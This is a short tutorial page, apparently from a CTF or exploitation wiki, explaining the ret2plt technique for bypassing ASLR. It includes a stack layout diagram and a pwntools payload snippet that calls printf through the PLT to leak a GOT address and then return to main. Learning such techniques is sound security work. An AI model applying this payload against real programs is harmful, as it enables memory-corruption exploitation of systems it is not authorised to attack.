Ret2plt

ASLR bypass

A ret2plt (return-to-PLT) attack is a type of exploitation technique that allows an attacker to execute arbitrary code by redirecting the flow of execution to a function in the Procedure Linkage Table (PLT).

How it works ?

In a ret2plt attack, the attacker overwrites the return address, using buffer overflow or format string exploit for example**,** of a function with the address of a function in the PLT. When the function returns, the program will jump to the function in the PLT instead of the next instruction in the original code.

The execution of this technique may vary depending on the instruction set architecture and the calling convention used. In this article, the x86 standard calling convention will be used as an example.

  address   |   values
------------+-------------------------------------------------------------------
            |   +------------------------- Buffer ---------------------------+
0xffffd264: |   |   0x41414141    0x41414141    0x41414141      0x41414141   |
            |   +------------------------------------------------------------+
            |     +- plt addr -+ +-saved eip -+ +--- param --+               |
0xffffd274: |     | 0x565561dd | | 0xffffd35c |	| 0xffffd12c |	0x00000001   |
            |     +------------+ +------------+ +------------+               |
  ...       |    ...

In order to make the stack in this state, the following payload must be used :

[buffer overflow needed lenght][plt function() address][any 4 bytes][parameter]
from pwn import * 

elf = ELF('./chall')

payload = flat(
    b'A' * padding,
    elf.plt['printf'],
    elf.symbols['main'],
    elf.got['printf']
)

In this example, the exploit will call the printf() function with the printf() address stored in the got as parameter and the execution flaw will return to main.

Last updated